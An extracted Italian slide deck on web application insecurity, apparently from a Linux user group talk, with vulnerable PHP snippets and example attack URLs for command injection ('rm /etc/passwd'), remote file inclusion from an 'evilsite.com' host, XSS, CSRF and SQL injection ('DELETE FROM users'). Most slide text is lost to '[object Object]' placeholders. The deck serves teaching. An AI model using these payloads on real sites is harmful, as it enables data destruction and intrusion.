Web Application Insecurity Uncensored

Alessandro “jekil” Tanasi [email_address] http://www.tanasi.it Web Application (In)Security LUG Trieste UNCENSORED

Introduzione.. Affermazioni illustri di manager, aziende, enti non citati. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ ..no no, non esiste documentazione. Tanto è solo carta inutile! Ma certo che sono sicuro! Il sito è protetto da firewall e antivirus Anzi.. usiamo un ritrovato della sicurezza chiamato S..S.. SSL! Ci protegge lui, figo no? Ma alla fine, ti dirò, la sicurezza non ci interessa al momento ?

Un comune sito web Abbiamo provato, e abbiamo miseramente fallito. Questo ci insegna che non vale la pena di provare. Homer Simpson

Siti e applicazioni web ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Architettura ,[object Object],[object Object],[object Object],Web Servers Presentation Layer Media Store Database Server Customer Identification Access Controls Transaction Information Core Business Data Application Server Business Logic Content services

Un brutto giorno... ,[object Object],[object Object],[object Object],[object Object],[object Object]

Quali problemi? ,[object Object],[object Object],[object Object],[object Object],Mancanza di competenze degli sviluppatori, non comprensione dei problemi da parte del management, poca importanza data alla sicurezza. Indisponibilità a investire in cose che non danno un ritorno visibile.

Statistiche.. Source: 2006 CSI/FBI survey

Una nuova web era People that writes at the state of the art, make the world more secure. Sarah Gordon

Web 2.0 Components ,[object Object],[object Object],[object Object],[object Object]

Tecnologie 2.0 ,[object Object],[object Object],[object Object],[object Object],[object Object],Ma.. gli sviluppatori web sanno gestire tutto questo in modo sicuro ?

Vulnerabilità comuni To win a war, one must know the way. Sun Tzu The Art of War

Utente, user input ,[object Object],[object Object],[object Object],[object Object],[object Object]

Globals ,[object Object],[object Object],[object Object],http://example.com/index.php ,[object Object],[object Object],[object Object],http://example.com/index.php?pippo=all

Code injection ,[object Object],[object Object],[object Object],http://example.com/index.php?arg=marmotta ,[object Object],[object Object],[object Object],[object Object],http://example.com/index.php?arg= marmotta; rm /etc/passwd

Remote file inclusion ,[object Object],[object Object],<?php include($layout); ?> http://example.com/index.php?layout=green http://example.com/index.php?layout=http://evilsite.com/evilscript

Esempi ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Exploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Cross site scripting(XSS) ,[object Object],[object Object],[object Object],<?php echo “You searched for $q”; // show results ?> http://example.com/index.php?q=marmotta http://example.com/index.php?q=<script>alert('buh!')</script>

XSS ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Exploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

CSRF ,[object Object],[object Object],[object Object],[object Object],<img src="http://google.com/search?q=porno"/>

SQL Injection ,[object Object],[object Object],[object Object],[object Object],<?php mysql_query(“SELECT * FROM users WHERE uid='$var'”); ?> http://example.com/index.php?var=123 http://example.com/index.php?var=aaa'; DELETE FROM users;

Autenticazione debole ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Errori di gestione ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

OWASP Top 10 2007 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],http://www.owasp.org

Ulteriori minacce ,[object Object],[object Object],[object Object]

Web Services ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Malware ,[object Object],[object Object],[object Object],[object Object],[object Object]

Altre vulnerabilità ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Conclusioni ,[object Object],[object Object],[object Object],[object Object],[object Object]

Slides ,[object Object],[object Object],[object Object],[object Object],[object Object]

Licenza ,[object Object],[object Object],[object Object],[1] http://creativecommons.org/licenses/by-nc-sa/2.0/

Web Application Insecurity Uncensored

Recommandé

Recommandé

Contenu connexe

Similaire à Web Application Insecurity Uncensored

Similaire à Web Application Insecurity Uncensored (20)

Plus de jekil

Plus de jekil (15)

Web Application Insecurity Uncensored